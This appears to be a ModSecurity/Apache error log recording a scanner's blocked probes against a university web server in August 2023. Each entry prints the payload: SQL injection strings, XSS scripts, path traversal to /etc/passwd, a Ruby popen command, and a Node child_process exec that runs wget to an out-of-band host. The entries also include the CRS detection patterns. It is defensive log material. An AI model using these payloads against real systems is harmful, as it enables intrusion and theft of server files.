[Tue Aug 29 11:43:40.470788 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfEBu0AAAAO"]
[Tue Aug 29 11:43:42.557600 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdxUYEAAAAC"]
[Tue Aug 29 11:43:44.387559 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAeX1IEAAAAK"]
[Tue Aug 29 11:43:45.372727 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdeQ7IAAAAQ"]
[Tue Aug 29 11:43:47.419721 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAe8l38AAAAF"]
[Tue Aug 29 11:43:48.392431 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAeChf4AAAAw"]
[Tue Aug 29 11:43:48.454988 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAeChgEAAAAw"]
[Tue Aug 29 11:43:49.415423 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAeChgQAAAAw"]
[Tue Aug 29 11:43:50.409018 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAe8l44AAAAF"]
[Tue Aug 29 11:43:50.440752 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAcsLN0AAAAE"]
[Tue Aug 29 11:43:51.392095 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAc4Es0AAAAP"]
[Tue Aug 29 11:43:55.479005 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfbkq4AAAAZ"]
[Tue Aug 29 11:43:55.747935 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAeChhQAAAAw"]
[Tue Aug 29 11:43:57.373448 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAdxUa8AAAAC"]
[Tue Aug 29 11:43:57.438939 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jcCo-f0AAAdb7vUAAAAb"]
[Tue Aug 29 11:43:58.432035 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdb7vcAAAAb"]
[Tue Aug 29 11:43:59.395604 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAfiYkUAAAAg"]
[Tue Aug 29 11:44:03.395136 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdeQ88AAAAQ"]
[Tue Aug 29 11:44:03.724315 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAe8l7wAAAAF"]
[Tue Aug 29 11:44:08.395898 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13mMCo-f0AAAfZj2gAAAAN"]
[Tue Aug 29 11:44:08.418026 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAdeQ9oAAAAQ"]
[Tue Aug 29 11:44:08.471604 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfky@IAAAAi"]
[Tue Aug 29 11:44:10.434904 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAcvBqwAAAAJ"]
[Tue Aug 29 11:44:13.440775 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAenGewAAAAM"]
[Tue Aug 29 11:44:14.388008 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAfg7xIAAAAe"]
[Tue Aug 29 11:44:16.470411 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26guukpar6axtakn.oast.site found within TX:1: cjmnbitjmimt14dgn26guukpar6axtakn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAfVkZEAAAAD"]
[Tue Aug 29 11:44:19.405334 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAdxUd4AAAAC"]
[Tue Aug 29 11:44:20.443603 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gqay47xek5ixqz.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAeChjsAAAAw"]
[Tue Aug 29 11:44:23.564465 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAARphDQAAAAU"]
[Tue Aug 29 11:44:26.424138 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAftVFUAAAAf"]
[Tue Aug 29 11:44:27.365428 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfSWbsAAAAB"]
[Tue Aug 29 11:44:29.448370 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfWN3sAAAAL"]
